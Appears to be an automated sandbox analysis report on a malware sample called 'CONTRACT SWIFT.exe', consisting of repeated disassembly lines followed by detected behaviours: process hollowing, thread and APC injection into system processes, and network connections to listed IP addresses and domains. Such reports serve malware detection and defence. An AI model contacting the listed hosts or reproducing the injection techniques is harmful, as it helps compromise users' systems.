Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_016A8CD6 mov eax, dword ptr fs:[00000030h]	5_2_016A8CD6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015E849B mov eax, dword ptr fs:[00000030h]	5_2_015E849B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01694496 mov eax, dword ptr fs:[00000030h]	5_2_01694496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01694496 mov eax, dword ptr fs:[00000030h]	5_2_01694496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01694496 mov eax, dword ptr fs:[00000030h]	5_2_01694496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01694496 mov eax, dword ptr fs:[00000030h]	5_2_01694496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01694496 mov eax, dword ptr fs:[00000030h]	5_2_01694496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01694496 mov eax, dword ptr fs:[00000030h]	5_2_01694496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01694496 mov eax, dword ptr fs:[00000030h]	5_2_01694496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01694496 mov eax, dword ptr fs:[00000030h]	5_2_01694496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01694496 mov eax, dword ptr fs:[00000030h]	5_2_01694496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01694496 mov eax, dword ptr fs:[00000030h]	5_2_01694496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01694496 mov eax, dword ptr fs:[00000030h]	5_2_01694496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01694496 mov eax, dword ptr fs:[00000030h]	5_2_01694496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01694496 mov eax, dword ptr fs:[00000030h]	5_2_01694496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_016A8F6A mov eax, dword ptr fs:[00000030h]	5_2_016A8F6A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015EEF40 mov eax, dword ptr fs:[00000030h]	5_2_015EEF40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015EFF60 mov eax, dword ptr fs:[00000030h]	5_2_015EFF60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015FF716 mov eax, dword ptr fs:[00000030h]	5_2_015FF716
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0160E730 mov eax, dword ptr fs:[00000030h]	5_2_0160E730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015FB73D mov eax, dword ptr fs:[00000030h]	5_2_015FB73D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015FB73D mov eax, dword ptr fs:[00000030h]	5_2_015FB73D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_016A070D mov eax, dword ptr fs:[00000030h]	5_2_016A070D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_016A070D mov eax, dword ptr fs:[00000030h]	5_2_016A070D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0160A70E mov eax, dword ptr fs:[00000030h]	5_2_0160A70E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0160A70E mov eax, dword ptr fs:[00000030h]	5_2_0160A70E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015D4F2E mov eax, dword ptr fs:[00000030h]	5_2_015D4F2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015D4F2E mov eax, dword ptr fs:[00000030h]	5_2_015D4F2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0166FF10 mov eax, dword ptr fs:[00000030h]	5_2_0166FF10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0166FF10 mov eax, dword ptr fs:[00000030h]	5_2_0166FF10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_016137F5 mov eax, dword ptr fs:[00000030h]	5_2_016137F5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015E8794 mov eax, dword ptr fs:[00000030h]	5_2_015E8794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01657794 mov eax, dword ptr fs:[00000030h]	5_2_01657794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01657794 mov eax, dword ptr fs:[00000030h]	5_2_01657794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01657794 mov eax, dword ptr fs:[00000030h]	5_2_01657794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015E7E41 mov eax, dword ptr fs:[00000030h]	5_2_015E7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015E7E41 mov eax, dword ptr fs:[00000030h]	5_2_015E7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015E7E41 mov eax, dword ptr fs:[00000030h]	5_2_015E7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015E7E41 mov eax, dword ptr fs:[00000030h]	5_2_015E7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015E7E41 mov eax, dword ptr fs:[00000030h]	5_2_015E7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015E7E41 mov eax, dword ptr fs:[00000030h]	5_2_015E7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015FAE73 mov eax, dword ptr fs:[00000030h]	5_2_015FAE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015FAE73 mov eax, dword ptr fs:[00000030h]	5_2_015FAE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015FAE73 mov eax, dword ptr fs:[00000030h]	5_2_015FAE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015FAE73 mov eax, dword ptr fs:[00000030h]	5_2_015FAE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015FAE73 mov eax, dword ptr fs:[00000030h]	5_2_015FAE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0169AE44 mov eax, dword ptr fs:[00000030h]	5_2_0169AE44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0169AE44 mov eax, dword ptr fs:[00000030h]	5_2_0169AE44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015E766D mov eax, dword ptr fs:[00000030h]	5_2_015E766D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0168FE3F mov eax, dword ptr fs:[00000030h]	5_2_0168FE3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015DC600 mov eax, dword ptr fs:[00000030h]	5_2_015DC600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015DC600 mov eax, dword ptr fs:[00000030h]	5_2_015DC600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015DC600 mov eax, dword ptr fs:[00000030h]	5_2_015DC600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01608E00 mov eax, dword ptr fs:[00000030h]	5_2_01608E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01691608 mov eax, dword ptr fs:[00000030h]	5_2_01691608
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0160A61C mov eax, dword ptr fs:[00000030h]	5_2_0160A61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0160A61C mov eax, dword ptr fs:[00000030h]	5_2_0160A61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015DE620 mov eax, dword ptr fs:[00000030h]	5_2_015DE620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_016016E0 mov ecx, dword ptr fs:[00000030h]	5_2_016016E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01618EC7 mov eax, dword ptr fs:[00000030h]	5_2_01618EC7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0168FEC0 mov eax, dword ptr fs:[00000030h]	5_2_0168FEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_016036CC mov eax, dword ptr fs:[00000030h]	5_2_016036CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_016A8ED6 mov eax, dword ptr fs:[00000030h]	5_2_016A8ED6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015E76E2 mov eax, dword ptr fs:[00000030h]	5_2_015E76E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_016546A7 mov eax, dword ptr fs:[00000030h]	5_2_016546A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_016A0EA5 mov eax, dword ptr fs:[00000030h]	5_2_016A0EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_016A0EA5 mov eax, dword ptr fs:[00000030h]	5_2_016A0EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_016A0EA5 mov eax, dword ptr fs:[00000030h]	5_2_016A0EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0166FE87 mov eax, dword ptr fs:[00000030h]	5_2_0166FE87
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_037A3B7A mov eax, dword ptr fs:[00000030h]	10_2_037A3B7A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_037A3B7A mov eax, dword ptr fs:[00000030h]	10_2_037A3B7A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_0382D380 mov ecx, dword ptr fs:[00000030h]	10_2_0382D380
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_0383138A mov eax, dword ptr fs:[00000030h]	10_2_0383138A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_0377DB60 mov ecx, dword ptr fs:[00000030h]	10_2_0377DB60
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_03845BA5 mov eax, dword ptr fs:[00000030h]	10_2_03845BA5
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_0377F358 mov eax, dword ptr fs:[00000030h]	10_2_0377F358
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_0377DB40 mov eax, dword ptr fs:[00000030h]	10_2_0377DB40
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_0379DBE9 mov eax, dword ptr fs:[00000030h]	10_2_0379DBE9
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_0383131B mov eax, dword ptr fs:[00000030h]	10_2_0383131B
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_037A03E2 mov eax, dword ptr fs:[00000030h]	10_2_037A03E2
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_037A03E2 mov eax, dword ptr fs:[00000030h]	10_2_037A03E2
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_037A03E2 mov eax, dword ptr fs:[00000030h]	10_2_037A03E2
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_037A03E2 mov eax, dword ptr fs:[00000030h]	10_2_037A03E2
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_037A03E2 mov eax, dword ptr fs:[00000030h]	10_2_037A03E2
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_037A03E2 mov eax, dword ptr fs:[00000030h]	10_2_037A03E2
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_037F53CA mov eax, dword ptr fs:[00000030h]	10_2_037F53CA
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_037F53CA mov eax, dword ptr fs:[00000030h]	10_2_037F53CA
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_037A4BAD mov eax, dword ptr fs:[00000030h]	10_2_037A4BAD
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_037A4BAD mov eax, dword ptr fs:[00000030h]	10_2_037A4BAD
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_037A4BAD mov eax, dword ptr fs:[00000030h]	10_2_037A4BAD
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_03848B58 mov eax, dword ptr fs:[00000030h]	10_2_03848B58
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_037AB390 mov eax, dword ptr fs:[00000030h]	10_2_037AB390
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_037A2397 mov eax, dword ptr fs:[00000030h]	10_2_037A2397
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_03781B8F mov eax, dword ptr fs:[00000030h]	10_2_03781B8F
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_03781B8F mov eax, dword ptr fs:[00000030h]	10_2_03781B8F
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_037B927A mov eax, dword ptr fs:[00000030h]	10_2_037B927A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_03779240 mov eax, dword ptr fs:[00000030h]	10_2_03779240
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_03779240 mov eax, dword ptr fs:[00000030h]	10_2_03779240
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_03779240 mov eax, dword ptr fs:[00000030h]	10_2_03779240
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_03779240 mov eax, dword ptr fs:[00000030h]	10_2_03779240
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_0379A229 mov eax, dword ptr fs:[00000030h]	10_2_0379A229
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_0379A229 mov eax, dword ptr fs:[00000030h]	10_2_0379A229
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_0379A229 mov eax, dword ptr fs:[00000030h]	10_2_0379A229
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_0379A229 mov eax, dword ptr fs:[00000030h]	10_2_0379A229
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_0379A229 mov eax, dword ptr fs:[00000030h]	10_2_0379A229
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_0379A229 mov eax, dword ptr fs:[00000030h]	10_2_0379A229
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_0379A229 mov eax, dword ptr fs:[00000030h]	10_2_0379A229
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_0379A229 mov eax, dword ptr fs:[00000030h]	10_2_0379A229
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_0379A229 mov eax, dword ptr fs:[00000030h]	10_2_0379A229
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_037B4A2C mov eax, dword ptr fs:[00000030h]	10_2_037B4A2C
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_037B4A2C mov eax, dword ptr fs:[00000030h]	10_2_037B4A2C
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_0377AA16 mov eax, dword ptr fs:[00000030h]	10_2_0377AA16
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_0377AA16 mov eax, dword ptr fs:[00000030h]	10_2_0377AA16
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_03793A1C mov eax, dword ptr fs:[00000030h]	10_2_03793A1C
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_03775210 mov eax, dword ptr fs:[00000030h]	10_2_03775210
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_03775210 mov ecx, dword ptr fs:[00000030h]	10_2_03775210
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_03775210 mov eax, dword ptr fs:[00000030h]	10_2_03775210
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_03775210 mov eax, dword ptr fs:[00000030h]	10_2_03775210
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_03788A0A mov eax, dword ptr fs:[00000030h]	10_2_03788A0A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_0383AA16 mov eax, dword ptr fs:[00000030h]	10_2_0383AA16
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_0383AA16 mov eax, dword ptr fs:[00000030h]	10_2_0383AA16
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_037A2AE4 mov eax, dword ptr fs:[00000030h]	10_2_037A2AE4
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_037A2ACB mov eax, dword ptr fs:[00000030h]	10_2_037A2ACB
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_0378AAB0 mov eax, dword ptr fs:[00000030h]	10_2_0378AAB0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_0378AAB0 mov eax, dword ptr fs:[00000030h]	10_2_0378AAB0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_037AFAB0 mov eax, dword ptr fs:[00000030h]	10_2_037AFAB0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_037752A5 mov eax, dword ptr fs:[00000030h]	10_2_037752A5
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_037752A5 mov eax, dword ptr fs:[00000030h]	10_2_037752A5
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_037752A5 mov eax, dword ptr fs:[00000030h]	10_2_037752A5
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_037752A5 mov eax, dword ptr fs:[00000030h]	10_2_037752A5
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_037752A5 mov eax, dword ptr fs:[00000030h]	10_2_037752A5
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_0383EA55 mov eax, dword ptr fs:[00000030h]	10_2_0383EA55
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_03804257 mov eax, dword ptr fs:[00000030h]	10_2_03804257
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_0382B260 mov eax, dword ptr fs:[00000030h]	10_2_0382B260
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_0382B260 mov eax, dword ptr fs:[00000030h]	10_2_0382B260
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_03848A62 mov eax, dword ptr fs:[00000030h]	10_2_03848A62
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_037AD294 mov eax, dword ptr fs:[00000030h]	10_2_037AD294
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_037AD294 mov eax, dword ptr fs:[00000030h]	10_2_037AD294
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_0377B171 mov eax, dword ptr fs:[00000030h]	10_2_0377B171
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_0377B171 mov eax, dword ptr fs:[00000030h]	10_2_0377B171
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_0377C962 mov eax, dword ptr fs:[00000030h]	10_2_0377C962
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_038349A4 mov eax, dword ptr fs:[00000030h]	10_2_038349A4
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_038349A4 mov eax, dword ptr fs:[00000030h]	10_2_038349A4
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_038349A4 mov eax, dword ptr fs:[00000030h]	10_2_038349A4
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_038349A4 mov eax, dword ptr fs:[00000030h]	10_2_038349A4
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_0379B944 mov eax, dword ptr fs:[00000030h]	10_2_0379B944
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_0379B944 mov eax, dword ptr fs:[00000030h]	10_2_0379B944
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_037A513A mov eax, dword ptr fs:[00000030h]	10_2_037A513A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_037A513A mov eax, dword ptr fs:[00000030h]	10_2_037A513A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_03794120 mov eax, dword ptr fs:[00000030h]	10_2_03794120
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_03794120 mov eax, dword ptr fs:[00000030h]	10_2_03794120
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_03794120 mov eax, dword ptr fs:[00000030h]	10_2_03794120
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_03794120 mov eax, dword ptr fs:[00000030h]	10_2_03794120
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_03794120 mov ecx, dword ptr fs:[00000030h]	10_2_03794120
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_038041E8 mov eax, dword ptr fs:[00000030h]	10_2_038041E8
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_03779100 mov eax, dword ptr fs:[00000030h]	10_2_03779100
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_03779100 mov eax, dword ptr fs:[00000030h]	10_2_03779100
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_03779100 mov eax, dword ptr fs:[00000030h]	10_2_03779100
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_0377B1E1 mov eax, dword ptr fs:[00000030h]	10_2_0377B1E1
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_0377B1E1 mov eax, dword ptr fs:[00000030h]	10_2_0377B1E1
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_0377B1E1 mov eax, dword ptr fs:[00000030h]	10_2_0377B1E1
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_037F51BE mov eax, dword ptr fs:[00000030h]	10_2_037F51BE
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_037F51BE mov eax, dword ptr fs:[00000030h]	10_2_037F51BE
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_037F51BE mov eax, dword ptr fs:[00000030h]	10_2_037F51BE
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_037F51BE mov eax, dword ptr fs:[00000030h]	10_2_037F51BE
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_037999BF mov ecx, dword ptr fs:[00000030h]	10_2_037999BF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_037999BF mov ecx, dword ptr fs:[00000030h]	10_2_037999BF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_037999BF mov eax, dword ptr fs:[00000030h]	10_2_037999BF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_037999BF mov ecx, dword ptr fs:[00000030h]	10_2_037999BF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_037999BF mov ecx, dword ptr fs:[00000030h]	10_2_037999BF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_037999BF mov eax, dword ptr fs:[00000030h]	10_2_037999BF

Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 208.110.82.29 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.campingquick.com
Source: C:\Windows\explorer.exe	Network Connect: 172.67.155.68 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 154.208.179.46 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 91.184.0.43 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 52.14.32.15 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.ecms2019.net
Source: C:\Windows\explorer.exe	Network Connect: 23.227.38.74 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 208.91.197.27 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.annafelicia.com
Source: C:\Windows\explorer.exe	Domain query: www.rnrsans.com
Source: C:\Windows\explorer.exe	Domain query: www.dominatedirectsales.com
Source: C:\Windows\explorer.exe	Network Connect: 217.160.0.220 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 192.0.78.25 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.votelaura.info
Source: C:\Windows\explorer.exe	Domain query: www.500truyen.com
Source: C:\Windows\explorer.exe	Domain query: www.qizhukeji.com
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.ursulaaubri.com
Source: C:\Windows\explorer.exe	Domain query: www.linjudama.com

Allocates memory in foreign processes

Show sources

Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread register set: target process: 3440	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread register set: target process: 3440	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Thread register set: target process: 3440	Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Section unmapped: C:\Windows\SysWOW64\netsh.exe base address: 9E0000

Jump to behavior

Writes to foreign memory regions

Show sources

Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000	Jump to behavior
